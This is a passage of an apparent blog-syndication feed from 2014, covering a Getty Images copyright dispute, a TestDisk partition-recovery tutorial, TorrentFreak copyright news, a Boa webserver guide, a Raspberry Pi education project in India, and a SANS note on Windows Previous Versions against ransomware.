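        parts = [p.strip() for p in line.split("|")]
        if len(parts) < 5:
            continue  # skip malformed lines
        _, ip, _, request, _ = parts[:5]
        requests[ip].append(request)
    flagged = []
    for ip, reqs in requests.items():
        # A polite browser/crawler fetches robots.txt or the stylesheets.
        polite = any("/robots.txt" in r or r.endswith(".css") for r in reqs)
        if not polite:
            flagged.append(ip)
    return flagged
```

A real browser session would trip the stylesheet check on the very first page load, so anything this flags across multiple requests is worth a closer look.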

Failure to perform due diligence
I want to emphasize that there are no other accesses to that blog entry by any address associated with Getty within months before their complaint. As of this year (from January 2014 to July 23, 2014), people at Getty have only visited the “In The Flesh” web page 13 times: once by the PicScout bot, and 12 times after they received my reply letter. This shows that Getty never viewed the web page prior to sending their letter. In effect, their “infringement” letter is nothing more than trolling and an attempt to extort money. They sent the letter without ever looking at the context in which the picture is used.

My claim that Getty never manually reviewed my web site prior to mailing is also supported by their second letter, where they recanted their claim of copyright infringement. Having actually looked at my blog, they realized that it was Fair Use.

My web logs are not my only proof that no human at Getty viewed the blog page in the months prior to sending the complaint. Getty’s threatening letter mentions only one single picture that is clearly labeled with Getty’s ImageBank watermark. However, if any human had visited the web page, then they would have seen FOUR pictures that are clearly associated with Getty, and all four pictures were adjacent on the web page! The four pictures are:

The first picture clearly says “GettyImages” in the top left corner. The second picture (from their complaint) is watermarked with Getty’s ImageBank logo. The third and fourth pictures come from Getty’s iStockPhoto service. Each photo was properly used as part of the research results in that blog entry. (And right now, they are properly used in the research findings of this blog entry.)

After Getty received my reply letter, they began to visit the “In The Flesh” URL from 216.169.250.12 — Getty’s corporate outbound web proxy address. Based on the reasonable assumption that different browser user-agent strings indicate different people, I observed them repeatedly visiting my site in groups of 3-5 people. Most of them initially visited the “In The Flesh” page at nealkrawetz.org; a few users visited my “About Me” and “Services” web pages. I am very confident that these indicate their attorneys reviewing my reply letter and web site. This is the absolute minimum evaluation that Getty should have done before sending their extortion letter.

Legal Issues
Besides pointing out how my blog entry clearly falls under Fair Use, my attorney noted a number of items that I (as a non-lawyer person) didn’t see. For example:

  • In Getty’s initial copyright complaint, they assert that they own the copyright. However, the burden of proof is on Getty Images. Getty provided no proof that they are the actual copyright holder, that they acquired the rights legally from the photographer, that they never transferred rights to anyone else, that they had a model release letter from the woman in the photo, that the picture was never made public domain, and that the copyright had not expired. In effect, they never showed that they actually have the copyright.

  • Getty’s complaint letter claims that they have searched their records and found no license for me to use that photo. However, they provided no proof that they ever searched their records. At minimum, during discovery I would demand a copy of all of their records so that I could confirm their findings and proof of their search. (Remember, the burden of proof is on Getty, not on me.) In addition, I have found public comments that explicitly identify people with valid licenses who reported receiving these hostile letters from Getty. This brings up the entire issue regarding how Getty maintains and searches their records.
  • Assuming some kind of violation (and I am not admitting any wrong here), there is a three-year statute of limitations regarding copyright infringement. My blog entry was posted on March 18, 2011. In contrast, their complaint letter was dated July 10, 2014 — that is more than three years after the pictures were posted on my site.

Known Research
Copyright law permits Fair Use for many purposes, including “research”. Even Getty’s own FAQ explicitly mentions “research” as an acceptable form of Fair Use. The question then becomes: am I a researcher and does my blog report on research? (Among other things, this goes toward my background section in the Copyright Declaratory Judgment filing.)

As it turns out, my web logs are extremely telling. I can see each time anyone at any network address associated with Getty Images visits my site. For most of my blog entries, I either get no Getty visitors or a few visitors. However, each time I post an in-depth research entry on digital photo forensics, I see large groups of people at Getty visiting the blog entry. I can even see when one Getty person comes through, and then a bunch of other Getty people visit my site — suggesting that one person told his coworkers about the blog entry. In effect, employees at Getty Images have been regular readers of my blog since at least 2011. (For discovery, I would request a forensic image of every computer in Getty’s company that has accessed my web site in order to determine if they used my site for research.)

Getty users also use my online analysis service, FotoForensics. This service is explicitly a research service. There are plenty of examples of Getty users accessing the FotoForensics site to view analysis images, read tutorials, and even upload pictures with test files that have names like “watermark.jpg” and “watermark-removed.jpg”. This explicitly shows that they are using my site as a research tool.

(For the ultra paranoid people: I have neither the time nor the desire to track down every user in my web logs. But if you send me a legal threat, I will grep through the data.)

However, the list does not stop there. For example, the Harvard Reference Guide lists me as the example for citing research from a blog. (PDF: see PDF page 44, document page 42.) Not only does Getty use my site as a research resource, Harvard’s style guide uses me as the example for a research blog (my bold for emphasis).

Blogs are NOT acceptable academic sources unless as objects of research

Paraphrasing, Author Prominent:
Krawetz (2011) uses a blog to discuss advanced forensic image analysis techniques.

Paraphrasing, Information Prominent:
Blogs may give credence to opinion, in some cases with supporting evidence; for example the claim that many images of fashion models have been digitally enhanced (Krawetz 2011).

Reference List Model:
Krawetz, N 2011, ‘The hacker factor blog’, web log, viewed 15 November 2011, http://www.hackerfactor.com/blog/

I should also point out that the AP and Reuters have both been very aware of my blog — including a VP at the AP — and neither has accused me of copyright infringement. They appear to recognize this as Fair Use. Moreover, with one of my blog entries on a Reuters photo (Without a Crutch), a Reuters editor referred to the blog entry as a “Great in-depth analysis” on the Reuters web site (see Sep 30, 2011) and on her twitter feed. This shows that Getty’s direct competitors recognize my blog as a research resource.

SLAPP
One of the things my attorney mentioned was California’s Anti-SLAPP law. Wikipedia explains SLAPP, or Strategic Lawsuit Against Public Participation, as “a lawsuit that is intended to censor, intimidate, and silence critics by burdening them with the cost of a legal defense until they abandon their criticism or opposition.” Wikipedia also says:

The plaintiff’s goals are accomplished if the defendant succumbs to fear, intimidation, mounting legal costs or simple exhaustion and abandons the criticism. A SLAPP may also intimidate others from participating in the debate. A SLAPP is often preceded by a legal threat. The difficulty is that plaintiffs do not present themselves to the Court admitting that their intent is to censor, intimidate or silence their critics.

In this case, Getty proceeded to send me a legal threat regarding alleged copyright infringement. Then they demanded $475 and threatened more actions if I failed to pay it. In contrast, it would cost me $400 to file for a Declaratory Judgment (more if I lived in other states), and costs could rise dramatically if Getty filed a lawsuit against me. In either scenario, it places a financial burden on me if I want to defend my First Amendment rights.

In the United States, California has special anti-SLAPP legislation. While not essential, it helps that Getty has offices in California and a network trace shows that some packets went from Getty to my blog through routers in California. As Wikipedia explains:

To win an anti-SLAPP motion, the defendant must first show that the lawsuit is based on claims related to constitutionally protected activities, typically First Amendment rights such as free speech, and typically seeks to show that the claim lacks any basis of genuine substance, legal underpinnings, evidence, or prospect of success. If this is demonstrated then the burden shifts to the plaintiff, to affirmatively present evidence demonstrating a reasonable probability of succeeding in their case by showing an actual wrong would exist as recognized by law, if the facts claimed were borne out.

This isn’t even half of his legal advice. I could barely take notes fast enough as he remarked about topics like Rule 11, tortious interference with a business relationship, Groucho Marx’s reply to Warner Brothers, and how Getty’s repeated access to my web site could be their way to inflate potential damage claims (since damages are based on the number of views).

A Little Due Diligence Goes A Long Way

Although this entire encounter with Getty Images took less than two weeks, I was preparing for a long battle. I even contacted the Electronic Frontier Foundation (EFF) to see if they could assist. The day after Getty recanted, I received a reply from the EFF: no less than four attorneys wanted to help me. (Thank you, EFF!)

I strongly believe that Getty Images is using a “cookie cutter” style of complaint and is not actually interested in any lawsuit; they just want to extort money from people who don’t know their rights or don’t have the fortitude for a long defense (SLAPP). Getty Images made no effort to evaluate the content beyond an automated search bot, made no attempt to review the bot’s results, provided no evidence that they are the copyright holder, provided no proof that they tried to verify licenses, and threatened legal action against me if I did not pay up.

I am glad that I stood up for my First Amendment rights.

Linux How-Tos and Linux Tutorials: How to Fix a Mangled Partition Table on Linux

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Carla Schroder. Original post: at Linux How-Tos and Linux Tutorials

fig-1 boot failure

Well there I was, rebuilding a router and having a good time, when I accidentally damaged the partition table on my main Linux installation, which is a GUID partition table, or GPT. Figure 1 (above) shows the cheery message that greeted me at boot.

How did this happen? I was installing Voyage Linux on a compact flash card, and while I was messing around with GParted and other filesystem tools I accidentally ran some commands on /dev/sdb, my main hard disk, instead of /dev/sdc, the compact flash card. Like, oops. I don’t know exactly which operations gummed up /dev/sdb, which would be good to know. But I don’t, so let us carry on.

“Press any key to exit” landed at a blinking cursor on a black screen. Fortunately, I always foil the desires of certain distros that disable ctrl+alt+delete, or make it behave like Windows and open a services manager. I make sure that it is enabled and that it reboots the system. I booted into a different Linux installation and pondered how to make repairs. When your partition table is damaged to the point that your Linux will not boot, you have to fix it from the outside of the damaged system via bootable rescue media, or another Linux in a multi-boot installation. SystemRescueCD on a USB stick is my fave. Any *buntu live system also makes a great rescue distro, especially on a USB stick with persistent storage, because then it remembers your settings, you can install apps, and store documents.

There are no guarantees: you may be able to repair the problem, or you may have to reinstall your operating system. If the partition table is unrecoverable you may not be able to recover your data. So, as always, your first and best line of defense is good backups.

TestDisk

A good tool for repairing partition tables and recovering files is TestDisk. TestDisk operates on both the legacy MBR and the newfangled GPT (see Using the New GUID Partition Table in Linux (Goodbye Ancient MBR)). TestDisk is in most Linux repos, and on SystemRescueCD. Start it up as root:

$ sudo testdisk
TestDisk 6.14, Data Recovery Utility, July 2013
Christophe GRENIER grenier@cgsecurity.org;
http://www.cgsecurity.org
TestDisk is free data recovery software designed to help recover lost
partitions and/or make non-booting disks bootable again when these symptoms
are caused by faulty software, certain types of viruses or human error.
It can also be used to repair some filesystem errors.
Information gathered during TestDisk use can be recorded for later
review. If you choose to create the text file, testdisk.log , it
will contain TestDisk options, technical information and various
outputs; including any folder/file names TestDisk was used to find and
list onscreen.
Use arrow keys to select, then press Enter key:
>[ Create ] Create a new log file
 [ Append ] Append information to log file
 [ No Log ] Don't record anything

Select “create a new log file”. In the next screen select the disk you want to repair.



Select a media (use Arrow keys, then press Enter):
 Disk /dev/sda - 2000 GB / 1863 GiB - ST2000DM001-1CH164
>Disk /dev/sdb - 640 GB / 596 GiB - WDC WD6401AALS-00J7B1
 Disk /dev/sdc - 32 GB / 29 GiB - SanDisk CF  Extreme USB2
 Disk /dev/sr0 - 366 MB / 349 MiB (RO) - ATAPI   iHAS424   B
 
>[Proceed ]  [  Quit  ]
 

This example shows two hard drives, a compact flash drive, and an audio CD. /dev/sdb is the broken one. In the next screen we select the partition type:

Disk /dev/sdb - 640 GB / 596 GiB - WDC WD6401AALS-00J7B1
Please select the partition table type, press Enter when done.
 [Intel  ] Intel/PC partition
>[EFI GPT] EFI GPT partition map (Mac i386, some x86_64...)
 [Humax  ] Humax partition table
 [Mac    ] Apple partition map
 [None   ] Non partitioned media
 [Sun    ] Sun Solaris partition
 [XBox   ] XBox partition
 [Return ] Return to disk selection
Hint: EFI GPT partition table type has been detected.

In the next screen, select Analyse:

Disk /dev/sdb - 640 GB / 596 GiB - WDC WD6401AALS-00J7B1
     CHS 77825 255 63 - sector size=512
>[ Analyse  ] Analyse current partition structure and search for lost partitions
 [ Advanced ] Filesystem Utils
 [ Geometry ] Change disk geometry
 [ Options  ] Modify options
 [ Quit     ] Return to disk selection

Hmm. This does not look good. Select Quick Search:

 TestDisk 6.14, Data Recovery Utility, July 2013
Christophe GRENIER grenier@cgsecurity.org;
http://www.cgsecurity.org

Disk /dev/sdb - 640 GB / 596 GiB - CHS 77825 255 63

Current partition structure:
     Partition                  Start        End    Size in sectors

Bad GPT partition, invalid signature.
Trying alternate GPT
Bad GPT partition, invalid signature.

P=Primary D=Deleted

>[Quick Search] Try to locate partition

This can take a little time, so be patient. And hopefully TestDisk will find your partitions:

TestDisk 6.14, Data Recovery Utility, July 2013
Christophe GRENIER grenier@cgsecurity.org;
http://www.cgsecurity.org

Disk /dev/sdb - 640 GB / 596 GiB - CHS 77825 255 63
     Partition                Start        End    Size in sectors
>  MS Data                       63   89470974    89470912
   MS Data                 80078846  265625597   185546752 [xubunthome]
 P MS Data                265625600 1250263039   984637440 [data-xubuntu]

Structure: Ok.  Use Up/Down Arrow keys to select partition.
Use Left/Right Arrow keys to CHANGE partition characteristics:
P=Primary D=Deleted
Keys A: add partition, L: load backup, T: change type, P: list files,
     Enter: to continue
ext4 blocksize=4096 Large file Sparse superblock, 45 GB / 42 GiB

Hurrah, this is looking hopeful. If it doesn’t find your swap partition, or gives you a message that it won’t restore it, don’t worry about it because a swap partition doesn’t hold data and you can easily restore it later. At this point you have the option to select a partition and press P to see your files, and copy them to another storage medium like a different hard drive or a USB stick. Don’t copy them back to the same device, because if your recovery fails your copied files go with it. It did a funny thing on my system: no matter which directory I chose to copy files into, they all went into /home/carla/carla. I couldn’t find out if this is the correct behavior, but I got my files back.

When TestDisk finds a partition that it can restore, it is marked in the left column with a P, and highlighted in green. In the above example that is only the third partition. Press the return key, and then you can try writing the partition to disk, or doing a deeper search for more recoverable partitions. The deeper search can take a long time, even several hours on a big hard disk.

TestDisk 6.14, Data Recovery Utility, July 2013
Christophe GRENIER <grenier@cgsecurity.org>
http://www.cgsecurity.org

Disk /dev/sdb - 640 GB / 596 GiB - CHS 77825 255 63
     Partition                  Start        End    Size in sectors
 1 * Linux                 16534 109 24 77825  70  5  984637440 [data-xubuntu]

[ Quit ]  >[Deeper Search]  [ Write ]
Try to find more partitions

Then you can select writing the recovered partitions to disk:

TestDisk 6.14, Data Recovery Utility, July 2013
Christophe GRENIER <grenier@cgsecurity.org>
http://www.cgsecurity.org

Write partition table, confirm ? (Y/N)

TestDisk 6.14, Data Recovery Utility, July 2013
Christophe GRENIER <grenier@cgsecurity.org>
http://www.cgsecurity.org

You will have to reboot for the change to take effect.

 >[Ok]

Several things could happen: You could get a complete restoration with all of your partitions and files. You could get a partial recovery that you can mount from another system and retrieve your files. Or it could all go to that great bitbucket in the sky. Most likely you will get at least some of your files back even if you can’t restore your partition table, because stuff that is written to disk is amazingly persistent.

Please visit CGsecurity.org to learn more about TestDisk, and also PhotoRec, an excellent data recovery tool.

TorrentFreak: University Sets Fines & Worse For Pirating Students

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

lsuAnyone providing an Internet-access infrastructure to third parties needs to be aware of the online piracy issue. For service providers, whether that’s a regular ISP, web host, or the operator of a free open WiFi in a local coffee shop, knowledge of how other people’s actions can affect them is a useful asset.

For universities in the United States, awareness of how Internet piracy can affect their institutions is especially crucial. On top of the requirements of the DMCA, in July 2010, exactly four years ago, the U.S. put in place a new requirement for colleges and universities to curtail illegal file-sharing on their networks. Failure to do so can result in the loss of federal funding, so, needless to say, campuses take the issue seriously.

Yesterday The Daily Reveille, the official news outlet of Louisiana State University, revealed that LSU’s IT Services receives between 15 and 20 complaints a month from copyright holders, an excellent result for a campus of around 30,000 students.

At the start of the last decade it was music companies doing most of the complaining, but security and policy officer Craig Callender says that since the advent of services such as Spotify, reports from TV companies have become more common.

But no matter where they originate, LSU acts on these allegations of infringement. A first complaint sees a student kicked offline, with Internet access only restored after the completion of an educational course covering illegal file-sharing.

Those who breach the rules again have worse to look forward to, starting with a fine.

“LSU is effectively combating unauthorized distribution of copyrighted material by fining students implicated in a verified DMCA copyright violation,” the university’s official policy document reads.

“The $50 fine provides a mechanism for recovering costs incurred in reviewing and processing DMCA notifications, and funding programs for awareness (e.g., education and ad campaign costs).”

Educational campaigns include the promotion of legal services, such as those outlined on the university’s chosen official resource list. Interestingly, while the links for music and books work, the MPAA page for legal TV shows and movies (for which the university receives the most notices) no longer exists.

But while the $50 fine might be harsh enough for a student on a limited budget, LSU warns of even tougher sanctions. Allegations of illegal file-sharing are noted on the student’s academic record which can have implications for his or her career prospects.

In addition, complaints can result in a referral to the Dean of Students’ office for violation of the LSU Code of Student Conduct. According to official documentation, the Student Conduct Office keeps Student Conduct files for seven years after the date of the incident, or longer if deemed necessary.

It’s clear that the work of the RIAA and MPAA over the last decade seriously unnerved universities, which have been forced to implement strict measures to curtail unauthorized sharing. LSU says it employs filtering technology to eliminate most P2P traffic, but it’s clear that some users are getting through.

Almost certainly others will be using VPN-like solutions to evade not only the P2P ban, but also potential complaints. Still, universities will probably care much less about these users, since they don’t generate DMCA notices and have no impact on their ability to receive federal funding.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Online Store Can Sell ‘Used’ Ebooks, Court Rules

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

tomskabinetPeople who buy an MP3, digital movie or an eBook assume that they have the right to do whatever they want with it, but copyright holders see things differently.

Platforms that allow people to resell digital goods are meeting fierce resistance from the entertainment industries, who view them as a threat to their online business models.

For example, the major record labels previously pointed out that MP3s are simply too good to resell, as they don’t deteriorate in quality. Similarly, movie studios complained that the ability to sell “used” videos would kill innovation.

The book industry is also concerned and in an attempt to counter this threat several publishers launched a lawsuit against Tom Kabinet, an online marketplace for used eBooks based in the Netherlands.

The publishers fear that the site will negatively impact their business, and that it can’t prevent people from reselling pirated copies. The companies asked the Amsterdam Court for a preliminary injunction against Tom Kabinet, but the request was denied this week.

The Amsterdam Court concluded that selling used eBooks is a legal grey area and not by definition illegal in Europe.

The EU Court of Justice previously ruled that consumers are free to resell games and software, even when there’s no physical copy. That case applied to licensed content, which differs from the Tom Kabinet case, so further investigation is needed to arrive at a final verdict.

The court therefore dismissed the publishers’ claims and ordered them to pay €23,469.56 in legal fees. Tom Kabinet, meanwhile, is still allowed to facilitate the sale of used eBooks.

It’s clear that the publishers didn’t get the result they hoped for. In fact, things have gotten worse, as Tom Kabinet’s visitor numbers have exploded. Shortly after the verdict was announced the site went offline because it couldn’t handle the surge in traffic.

These connectivity issues have been fixed now, and the site’s owner is happy with the outcome thus far.

“There is still a long way to go before legislation is clear on eBooks, but we’ve made a pretty good start,” Tom Kabinet informed TorrentFreak.

The publishers on the other hand are considering further steps, and it’s likely that the case will head to a full trial in the future.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Pirate Bay Launches Mobile Site, Teases More Expansions

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

pirate bayOne of The Pirate Bay’s strengths has been its resilience. No matter how hard the movie and music industries try, the site remains operational.

Over the years the Pirate Bay site has undergone many changes to make it harder to shut down. The tracker was put into retirement, torrents were traded in for magnet links, and the site moved its servers to the cloud.

What remained the same, however, was the site’s general appearance and its lack of support for mobile devices. That changes today.

The Pirate Bay has just debuted a new site for mobile devices. The Mobile Bay offers a much more usable interface to browse the torrent site on mobile devices.

Previously mobile users were simply presented with a smaller version of the regular Pirate Bay site, which was coded long before smartphones and tablets became popular. With banners on both sides it was rather hard to navigate on smaller devices.

The mobile version doesn’t change the overall appearance much, but it’s definitely more readable and easier to navigate.

The new vs. old mobile look
tpb-mob-oldnew

Users on mobile devices are now redirected to the new Mobile Bay domain, which will exist next to the regular site. People have the option to continue using the old layout if they prefer, but The Pirate Bay team doesn’t see any reason why people would.

“The normal version of the site renders like crap on mobile devices,” the TPB team told us.

The Mobile Bay is one of the largest visible updates to the site in years, but according to The Pirate Bay it’s only the beginning. Behind the scenes the TPB team is working on a series of new niche sites that will provide extra features and make it easier to find content.

The TV, movie and music sections on The Pirate Bay will each get their own dedicated sites. The TV site, for example, will allow users to see a complete overview of all episodes per show, download season packs, and more.

Another new project in the pipeline is RSSbay, which will support personalized RSS feeds, enabling people to launch torrents remotely.

“We will add more features later on, such as personal RSS feeds so users can browse torrents at work or school, and start the downloads at home,” the TPB team tells us.

Aside from improving the user experience, the other advantage of these separate domain names is that TPB can’t be taken out as easily.

“We’re trying to separate the site into different domain names to make it more resilient. In the event one domain get taken down, there will be plenty others left,” the TPB team says.

As always with The Pirate Bay, it’s hard to predict how long it will take before these new sites see the light of day, but the mobile edition is live now.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Director Wants His Film on The Pirate Bay, Pirates Deliver…

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

suzyDutch movie director Martin Koolhoven sent out an unusual request on Twitter a few days ago.

While many filmmakers fear The Pirate Bay, Koolhoven asked his followers to upload a copy of his 1999 film “Suzy Q” to the site.

“Can someone just upload Suzy Q to The Pirate Bay?” Koolhoven asked.

The director doesn’t own all copyrights to the movie himself, but grew frustrated by the fact that his film is not available through legal channels.

The TV film, which also features the film debut of Game of Thrones actress Carice van Houten, was paid for with public money, but after the music rights expired nobody could watch it anymore.

The main problem is with the film’s music, which includes tracks from popular artists such as The Rolling Stones and Jimi Hendrix. This prevented the film from being released in movie theaters and on DVD, and the TV-network also chose not to extend the licenses for the TV rights.

Since the music was no longer licensed it couldn’t be shown anymore, not even on the websites of the public broadcasters.

“To me, it felt like the movie had died,” Koolhoven tells TorrentFreak.

Hoping to bring it back to life, Koolhoven tweeted his upload request, and it didn’t take long before the pirates delivered. Within a few hours the first copy of the film was uploaded, and several more were added in the days that followed.

“I had no idea the media would pick it up the way they did. That generated more media attention. At first I hesitated because I didn’t want to become the poster boy for the download-movement. All I wanted was for people to be able to see my film,” Koolhoven says.

Unfortunately the first upload of the movie that appeared on The Pirate Bay was of very bad quality, so the director decided to go all the way and upload a better version to YouTube himself.

“I figured it would probably be thrown off after a few days, due to the music rights issue, but at least people could see a half decent version instead of watching the horrible copy that was available on The Pirate Bay,” Koolhoven tells us.

Interestingly, YouTube didn’t remove the film but asked the director whether he had the right to use the songs. Since this is not the case, the money made through advertisements on YouTube will go to the proper rightsholders.

“We’re a few days later now and the movie is still on YouTube. And people have started to put higher quality torrents of Suzy Q on Pirate Bay. Even 720p can be found, I’ve heard,” Koolhoven notes.

While the director is not the exclusive rightsholder, he does see himself as the moral owner of the title. Also, he isn’t shying away from encouraging others to download and share the film.

In essence, he believes that all movies should be available online, as long as it’s commercially viable. It shouldn’t hurt movie theater attendance either, as that remains the main source of income for most films and the best viewing experience.

“I know not everybody cares about that, but I do. The cinema is the best place to see movies. If you haven’t seen ‘Once Upon a Time in the West’ on the big screen, you just haven’t seen it,” Koolhoven says.

In the case of Suzy Q, however, people are free to grab a pirated copy.

“Everyone can go to The Pirate Bay and grab a copy. People are actually not supposed to, but they have my permission to download Suzy Q,” Koolhoven said in an interview with Geenstijl.

“If other people download the movie and help with seeding then the download time will be even more reasonable,” Koolhoven adds.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Linux How-Tos and Linux Tutorials: Share a Directory Quickly on Ubuntu Using Boa Webserver

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Muktware. Original post: at Linux How-Tos and Linux Tutorials

When it comes to HTTP servers, there are many options to choose from; Apache and Nginx are two of the best known names. Boa is a lesser-known lightweight (only ~300 KB) webserver that delivers good performance. Unlike traditional webservers, it doesn’t fork a new process for each connection; in other words, it is a single-tasking HTTP server. Its light memory footprint makes it suitable for running on embedded devices. Configuring Boa is also easy.

Boa runs on desktops, too. Let’s say you want to share a directory from your Ubuntu system with a colleague in a remote branch who uses a Microsoft Windows system but is on the same office network. The files are bigger than your email attachment limit, and your colleague needs to pick out several files from the directory. Boa can be a handy choice in situations like this, where you would like to share a directory quickly over HTTP. Of course you could choose another option such as Apache, but with Boa it takes barely a minute to install, set up, and share any directory over HTTP. This guide will show you how to do that on Ubuntu.
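For a sense of what the setup involves, here is a sketch of the relevant boa.conf directives. The file location, port, user/group, and shared path shown are assumptions based on Boa’s Debian/Ubuntu packaging, so verify them on your system:

```conf
# /etc/boa/boa.conf (location assumed from the Debian/Ubuntu package)
Port 80
User www-data
Group www-data
# Point the document root at the directory you want to share:
DocumentRoot /home/alice/shared
ErrorLog /var/log/boa/error_log
AccessLog /var/log/boa/access_log
```

After editing the file and restarting the boa service, your colleague should be able to browse the directory at http://<your-ip>/ from Windows.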

Read more at Muktware

Raspberry Pi: Exploring computing education in rural schools in India

This post was syndicated from: Raspberry Pi and was written by: Helen Lynn. Original post: at Raspberry Pi

Earlier this year, the Raspberry Pi Foundation supported a University of Cambridge team of two researchers, Dr Maximilian Bock and Aftab Jalia, in a pilot project exploring the possibilities of providing computing access and education in rural schools in India. Working with local organisations and using an adaptable three-day programme, they led two workshops in June 2014 introducing students and teachers to computing with the Raspberry Pi. The workshops used specially designed electronics kits, including Raspberry Pis and peripherals, that were handed over to the partner organisations.

Karigarshala students connect Raspberry Pis and peripherals

The first workshop took place at Karigarshala Artisan School, run by Hunnarshala Foundation in Bhuj, Gujarat; the attendees were a group of 15- to 19-year-old students who had left conventional education, as well as three local instructors. The students started off with very little computer experience and most had never typed on a keyboard, so a session introducing the keyboard was included, followed by sessions on programming, using the Raspberry Pi camera module and working with electronics.

Karigarshala students mastering hardware control of an LED via the Raspberry Pi GPIO


Students chose to spend their evenings revisiting what they had learned during the day, and by the end of the course all the students could write programs to draw shapes, create digital documents, connect electronic circuits, and control components such as LEDs using the Raspberry Pi.

Chamoli students practise on their own using a TV as a monitor


The second workshop welcomed six- to twelve-year-old pupils of the Langasu Primary School in the remote Chamoli district, Uttarakhand, along with three of their teachers. This younger group of students followed a programme with more focus on activities featuring immediate feedback — for example, Sonic Pi for live-coding music — alongside programming and electronics tasks. As they learned, students soon began teaching other students.

In an Ideas Competition held at the end of the workshop, entries reflected students’ engagement with the Raspberry Pi as a device with which to build solutions: an inverter system to deal with frequent power outages, a weather station that gives warnings, a robot to assist with menial chores.

Weather station/forecaster
Battery-operated inverter
Pi-controlled chores robot

The Cambridge team’s “Frugal Engineering” approach, delivering computing education without the need for elaborate infrastructure, proved very successful in both schools. Hunnarshala Foundation has decided to integrate the Raspberry Pi into its vocational training curriculum, while students at Langasu Primary School will not only carry on learning with Raspberry Pis at school but will be able to borrow self-contained Raspberry Pi Loan Kits to use at home. The Cambridge team remains in touch with the schools and continues to provide off-site support.

September 2014 and February 2015 will see the team build on this successful pilot with induction workshops in three new schools, as well as follow-up visits to evaluate the use of Raspberry Pi in past project sites and to provide support and resources for expanding the programmes.

SANS Internet Storm Center, InfoCON: green: Windows Previous Versions against ransomware, (Thu, Jul 24th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

One of the cool features that Microsoft actually added in Windows Vista is the ability to recover previous versions of files and folders. This is part of the VSS (Volume Shadow Copy Service), which allows automatic creation of backup copies on the system. Most users “virtually meet” this service when they are installing new software, when a restore point is created that allows a user to easily revert the operating system back to the original state if something goes wrong.

However, the “Previous Versions” feature can be very handy when other mistakes or incidents happen as well. For example, if a user deleted a file in a folder and the “Previous Versions” feature is active, it is very easy to restore the deleted file by clicking the appropriate button in the Properties menu of the drive/folder that contained it. The user can then simply browse through previous versions and restore the deleted file, as shown in the figure below:

Previous Versions tab

You can see in the figure above that there are actually multiple versions of the Desktop folder that were saved by the “Previous Versions” feature. A user can now simply click on any version he/she desires and browse through previous files.

How can this help against Cryptolocker and similar ransomware? Well, simply: when such ransomware infects a machine, it typically encrypts all document files such as Word and PDF files or pictures (JPG, PNG …). If the “Previous Versions” feature is running, then depending on several factors, such as the disk space allocated to it and the time of the last snapshot (since “Previous Versions” saves changes relative to the last snapshot, which normally takes place every day), you just might be lucky enough that *some* of the encrypted files are available in “Previous Versions”.

Monitoring “Previous Versions” activities

As we can see, by using this feature it is very simple to restore previous files. This is one of the reasons why I see many companies using this feature on shared disks – it can be very handy in case a user accidentally deleted a file.

However, there are also security implications here. For example, a user can restore a file that was previously deleted and that you thought was gone. Of course, the user still needs access rights on that file: if the ACL does not allow him to access the file, he won’t be able to restore it. But when an administrator sets ACLs on a directory, which is typically the case, and everything below it inherits them, the user might be able to access a file that was thought to be deleted.

This cannot be prevented (except by changing ACLs, of course), so all we can do in this case is try to monitor file restoration activities. Unfortunately, Windows is pretty (very?) limited in this regard. The best you can do is enable Object Access auditing to see file accesses and then check what a particular user accessed. That being said, I have not been able to reliably reproduce logs that tell me exactly which version the user accessed; in some cases Windows created a log such as the following:

Share Information:
                Share Name:                    \\*\TEST
                Share Path:                    \??\C:\TEST
                Relative Target Name:          @GMT-2014.07.02-11.56.38\eula.1028.txt

This is event 5145 (“A network share object was checked to see whether client can be granted desired access”), and it shows which shadow copy was accessed, but, as I said, I was not able to get this event generated consistently.
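For illustration, the @GMT- prefix in the Relative Target Name is the token SMB clients use to address a specific shadow-copy snapshot (the timestamp is UTC). A small Python sketch of composing such a path, with the share and file names taken from the log above:

```python
from datetime import datetime, timezone

def previous_version_path(share: str, snapshot_utc: datetime, relative: str) -> str:
    """Build a snapshot-relative SMB path using the @GMT token format
    seen in the event 5145 log above (snapshot timestamp is UTC)."""
    token = snapshot_utc.strftime("@GMT-%Y.%m.%d-%H.%M.%S")
    return "\\".join([share, token, relative])

snap = datetime(2014, 7, 2, 11, 56, 38, tzinfo=timezone.utc)
print(previous_version_path(r"\\server\TEST", snap, "eula.1028.txt"))
# prints: \\server\TEST\@GMT-2014.07.02-11.56.38\eula.1028.txt
```

This only reconstructs the naming convention; whether a given snapshot actually exists depends on the VSS configuration of the server.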

Conclusion

The “Previous Versions” feature is very handy when you need to restore a file that was accidentally deleted or modified, and it can sometimes even help when a bigger incident, such as a ransomware infection, happens. Make sure that you use this feature if you need it, but also be aware of the security implications, such as the fact that it automatically preserves deleted files and their modified copies.

Finally, for some reason Microsoft decided to remove, or rather modify, this feature in Windows 8. The “Previous Versions” tab no longer exists in Explorer (actually it does, but only for files accessed over a network share). For saving local files, Windows 8 now uses a feature called “File History”. It needs to be set up manually and requires an external HDD which will be used to save copies of files. This is definitely better since, if your main HDD dies, you can restore files from the external one, but keep in mind that it must be set up manually. Finally, if you use EFS to encrypt files, the “File History” feature will not work on them.


Bojan
bojanz on Twitter

INFIGO IS

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.